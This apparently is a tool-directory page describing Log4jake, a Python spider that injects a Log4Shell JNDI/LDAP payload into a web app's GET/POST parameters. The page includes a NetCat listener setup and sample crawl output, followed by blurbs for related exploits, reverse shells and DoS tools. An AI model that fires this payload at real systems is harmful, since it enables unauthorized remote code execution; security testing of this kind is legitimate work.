Log4jake

Log4jake works by spidering a web application for GET/POST requests. It will then automatically execute the GET/POST requests, filling any discovered parameters with the ${jndi:ldap://:389} Log4j payload. Note that this tool is designed to work simultaneously with a NetCat listener.

If you want to test behind authentication, use the commented '#req.add_header('Authorization', "token_goes_here")' line to add the proper token. If you are experiencing SSL errors, use the commented '#context = ssl._create_unverified_context()' line in addition to 'resp = urllib.request.urlopen(req, context=context)'

Syntax:

  └─$ python3 log4jake.py https://10.10.3.50
Remember to start NetCat Listener on port 389!!!
Enter IP address of your Listener: 10.10.3.4  

Starting Web Spider
-------------------

SPIDERING -> https://10.10.3.50/
SPIDERING -> https://10.10.3.50/signup
POST /signup
SPIDERING -> https://10.10.3.50/login
POST /login_exec
SPIDERING -> https://10.10.3.50/clients
SPIDERING -> https://10.10.3.50/admin/website
SPIDERING -> https://10.10.3.50/cdn-cgi/l/email-protection#9ef4f1f0defdf8ffedf7eafbedb0fdf1f3
SPIDERING -> https://10.10.3.50/forgotpassword
POST /mailer5

Log4jake works by spidering a web application for GET/POST requests

Related tags

Overview

Log4jake

Owner

Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.

wsvuls - website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.]

HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.

A Python Scanner for log4j

A Telegram Bot to force users to join a specific channel before sending messages in a group.

Python Library For Ethical Hacker

spring-cloud-gateway-rce CVE-2022-22947

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

APKLeaks - Scanning APK file for URIs, endpoints & secrets.

CVE-2021-36798 Exp: Cobalt Strike < 4.4 Dos

Cobalt Strike < 4.4 dos CVE-2021-36798

A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.

VPN Overall Reconnaissance, Testing, Enumeration and eXploitation Toolkit

CVE-2021-22205 Unauthorized RCE

DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

dos-atack-tor script de python que permite usar conexiones cebollas para atacar paginas .onion o paginas convencionales via tor.

Confluence OGNL injection

An advanced multi-threaded, multi-client python reverse shell for hacking linux systems

a cool, easily usable and customisable subdomains scanner

Confluence Server Webwork OGNL injection